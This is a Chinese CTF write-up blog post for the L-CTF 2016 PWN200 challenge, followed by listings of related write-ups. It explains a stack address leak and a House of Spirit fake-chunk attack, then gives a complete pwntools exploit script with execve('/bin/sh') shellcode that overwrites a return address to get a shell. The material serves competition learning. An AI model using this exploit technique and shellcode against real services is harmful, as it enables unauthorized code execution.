L-CTF2016 PWN200 writeup

最新推荐文章于 2022-12-31 12:44:00 发布
最新推荐文章于 2022-12-31 12:44:00 发布
阅读量651 收藏 1
点赞数
分类专栏: 学习日记 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42151611/article/details/98220974
版权
本以为已经可以做出题来了。。。没想到连利用点在哪都没看见
例行公事


居然什么保护都没开,有趣

利用点分析

  • v2位于rbp-0x30的位置,而name会读入0x30个字符,且如果读入0x30个字符的话末尾不会有\x00,这样在printf的时候就会顺带leak出rbp的值
  • id保存在rbp-0x38的位置

    *buf在栈上的位置是rbp-0x40,dest在栈上的位置是rbp-0x8,但是buf却读了0x40个字节,很明显最后八字节会将dest的块的地址覆盖
  • strcpy遇到\x00停止
利用方法
  1. 先leak出rbp的地址
  2. 用money构造fake chunk,然后再用id字段构造next chunk的size,此时money与id之间保存的内容包括了当前调用空间的rbp以及ret address
  3. 将dest的地址覆盖成fake chunk的地址,然后用check out函数将其free
  4. 再check in同样的size,然后往栈中构造shellcode,再将ret address覆盖成payload的地址
  5. 或者也可以在第一次输入money的时候就输入payload,但是要注意控制好长度,不然会因为strcpy将已经覆盖好的dest再覆盖成shellcode
exp
from pwn import *
context(arch='amd64',os='linux')
context.log_level = 'debug'
io = process('./pwn200')
shellcode=""
shellcode += "\x00\x31\xf6\x48\xbb\x2f\x62\x69\x6e"
shellcode += "\x2f\x2f\x73\x68\x56\x53\x54\x5f"
shellcode += "\x6a\x3b\x58\x31\xd2\x0f\x05"
io.recvuntil('who are u?\n')
io.send('a'*0x30)
io.recvuntil('a'*0x30)
rbp_addr = u64(io.recv(6).ljust(8,'\x00'))
log.success('rbp : '+hex(rbp_addr))
io.recvuntil('give me your id ~~?\n')
io.sendline('33')
io.recvuntil('give me money~\n')
payload = shellcode +p64(0)*2 + p64(0x41)
payload = payload.ljust(0x38,'\x00')
payload += p64(rbp_addr - 0x90)
io.send(payload)
io.recvuntil('your choice : ')
io.sendline('2')
io.recvuntil('your choice : ')
io.sendline('1')
io.recvuntil('how long?\n')
#gdb.attach(io,'b *0x4008FD')
#raw_input()
io.sendline(str(0x30))
io.recv()
io.sendline(p64(0)*3+p64(rbp_addr - 0xc0 + 1))
io.recv()
io.sendline('3')
io.interactive()
哒君
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
l-ctf2016pwn200 hose-of-spirite
九层台
03-09 460
这里看可以输入48个字节,最后没有跟00能够泄露出来rbp 从ida上面看是这样的,id并没有保存。 但是实际上 id被保存到了这里。 var_38被定义为 刚好再输入的name上面。在栈上显示如下图 #coding=utf-8 from pwn import * context(arch='amd64',os='linux') context.log_level = 'debug' p =...
BUUCTF--lctf2016_pwn200
qq_73149934的博客
04-01 252
free(ptr)后再malloc(0x30),得到这块fake_chunk的控制权,接着将返回地址(get_money_ret)覆盖为shellcode_addr,退出拿到shell。向$buf输入,构造fake_chunk且覆盖dest(ptr)的size,同时修改ptr指向fake_chunk的mem部分。这里得到的是rbp中的值,不是rbp的地址,通过调试得到偏移。3.利用”give me money~“,布置。5.修改返回地址为shellcode的地址。是一个入住宾馆的题目。
lctf2016_pwn200
z1r0的博客
02-22 2709
lctf2016_pwn200 查看保护 这里有一个漏洞,read的时候可以泄露栈上的地址,因为没有\x00来截断。 这里会将buf的东西给复制到dest这里。然后ptr全局变量为dest。 这个函数就是一个add和delete的堆功能。 攻击思路:可以将shellcode写入第一次输入的地方,再借助这里输出ebp地址,然后算出shellcode_addr。到了strcpy这里的话可以使用\x00来截断复制功能然后填满buf,接着劫持free_got为shellcode_addr(free_got)
lctf2016_pwn200 堆利用
人饭子的博客
12-31 487
lctf2016:pwn200 堆利用 一、信息收集 RELRO:在Linux系统安全领域数据可以写的存储区就会是攻击的目标,尤其是存储函数指针的区域。 所以在安全防护的角度来说尽量减少可写的存储区域对安全会有极大的好处.GCC, GNU linker以及Glibc-dynamic linker一起配合实现了一种叫做relro的技术: read only relocation。大概实现就是由l...
Buu CTF PWN [第五空间2019 决赛]PWN5 WriteUp
m0sway的博客
03-04 370
Buu CTF PWN题第五空间2019 决赛]PWN5的WriteUp
D3CTF2022-官方WriteUp1
08-03
"D3CTF2022-官方WriteUp1" 本文将对 D3CTF 2022 官方 WriteUp1 进行总结,主要涉及 MySQL UDF 提权、Java 反序列化、MySQLInject、Web 短链技术等多方面的知识点。 1. MySQL UDF 提权 在 MySQL 中,可以使用 User...
pwn-writeups:CTF pwn问题写入
02-20
pwnで解いた问题のwriteup达。すごく古いやつからすごく新しいやつまであるしすごく眠い。基本的には解いたものを自分で书いたexploitと一绪においてあるが,一部これから解こうとしてあるやつが间违ってpushしてあ...
Jeopardy-Writeups:SniperOJ的CTF挑战比赛
05-18
SniperOJ的挑战文章和源代码描述平台...─ pwn│ ├── pwn100-bof-x86-64│ ├── pwn100-shellcode-x86-64│ ├── pwn150-static-x86-64│ ├── pwn200-actf-run-circles│ ├── pwn200-shorter-shellc
wani-writeup:大阪大学CTF团队Wani Hackase提供的CTF解决方案
04-30
pwn(可拥有) 网路(网路) 转(反向) 用于(取证) 性别(隐写术) 适当添加其他字符(建议使用3个字符,超过此限制) problemName被简化到可以确定的程度 README.md中的写操作 将与问题相关的代码文件上载...
pwn栈溢出10道练习题有writeup
01-04
在网络安全领域,"pwn" 是一个常见的术语,通常用于指代与系统漏洞利用和控制权获取相关的挑战。...通过这些题目和writeup,你可以逐步提升在pwn领域的技能,为参与CTF比赛或进行安全研究打下坚实基础。
2017湖湘杯pwn200
12-02
2017湖湘杯pwn200的题目,请大家自行下载。。。。。。
CTF PWN-攻防世界XCTF新手区WriteUp
道阻且长,行则将至。
10-20 9291
文章目录前言001 get_shell002 hello_pwn 前言 PWN 是一个黑客语法的俚语词 ,是指攻破设备或者系统 。发音类似“砰”,对黑客而言,这就是成功实施黑客攻击的声音——砰的一声,被“黑”的电脑或手机就被你操纵。以上是从百度百科上面抄的简介,而我个人理解的话,应该就是向目标发送特定的数据,使得其执行本来不会执行的代码,前段时间爆发的永恒之蓝等病毒其实也算得上是 pwn 的一种。 CTF 中 PWN 类型的题目的目标是拿到 flag,一般是在 linux 平台下通过二进制/系统调用等方式编
buu lctf2016_pwn200
qq_51474381的博客
04-25 278
代码分析 1.可泄露rbp(就是泄露栈地址,因为没有\x00截断时会连带输出后面的数据)。 2.buf可覆盖ptr(栈上变量覆盖),strcpy()可能会破坏我们构造好的payload,但是strcpy()并不会复制"\x00",所以在shellcode最前面要加上"\x00",这样就只有溢出,没有复制 3.后面就是堆的操作了,只有add和delete 总体思路 1.泄露rbp,获得栈地址。 2.写入shellcode+伪造size+覆盖dest,从而控制ptr。 3.free掉.
Bugku pwn
ChanCherry的博客
08-25 763
pwn1 在Linux里面输入以下命令, nc 114.116.54.89 10001 //nc用于设置路由器 ls -l 然后cat flag,即可得到flag nc命令 nc命令是一个功能打包的网络实用程序,它通过命令行在网络上读取和写入数据;nc是为NMAP项目编写的,是目前已分裂的netcat家族的顶峰,它被设计成一个可靠的后端工具,可以立即为其他用户提供网络连接应用程序和用户。nc不...
LCTF 2016 PWN200(House Of Spirit)
Bill
03-24 1642
L-CTF 2016 pwn200 漏洞简介 The house of Spirit The House of Spirit is a little different from other attacks in the sense that it involves an attacker overwriting an existing pointer before it is ‘fr...
强网杯ctf pwn&re writeup (部分)
这里没人
06-04 7104
打了2天的强网杯,虽然一度冲进了前10。可惜最后的时候还是掉出了20名。最后只能无奈打出GG。其中的原因有很多,也不想多说了。 逆向溢出题3连发。我就只会那么多了Orz 先来一道re200 kergen 发送24位的字符串,主要是400B56处的检验函数。检验方法是这样的先是发送字符的第1 10 7 11 2 13 16 17位,中间插入43917202。然后MD5,然后转化成32位字符串形
PWN学习笔记--HCTF2017 pwn200
I have a dream
04-25 425
参考链接:https://bbs.pediy.com/thread-224645.htm 考点:格式化字符串、GOT覆盖 思路:首先利用格式化字符串泄露出puts函数的实际地址,然后根据libc计算出system的地址。接着用得到的system的地址覆盖atoi的got地址,最后传入/bin/sh参数即可。 漏洞程序: 2017湖湘杯pwn200 漏洞利用程序: from pwn import ...
xdctf-pwn200
Vccxx的博客
04-08 1331
XDCTF (哪一年的忘了)中的一道pwn题题目地址http://pan.baidu.com/s/1hszHtwo解题思路:缓冲区溢出->泄露ebp->覆盖got表->执行shellcode首先用ida分析这题的反汇编:这里是一个关键的缓冲区溢出点,这里虽然v2的长度和读入的最大长度一致,但是我们知道对于printf函数,如果后面的地址中(这里是v2的栈地址)的内容没有”/x00”这样的结束符,就会
学习ctf和pwn的网址
最新发布
03-15
2. Pwnable.kr:http://pwnable.kr/ - Pwnable.kr是一个专注于Pwn题目的在线平台,****** CTF Wiki:https://ctf-wiki.github.io/ctf-wiki/ - CTF Wiki是一个开放的CTF知识库,包含了各种CTF相关的知识、技巧...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值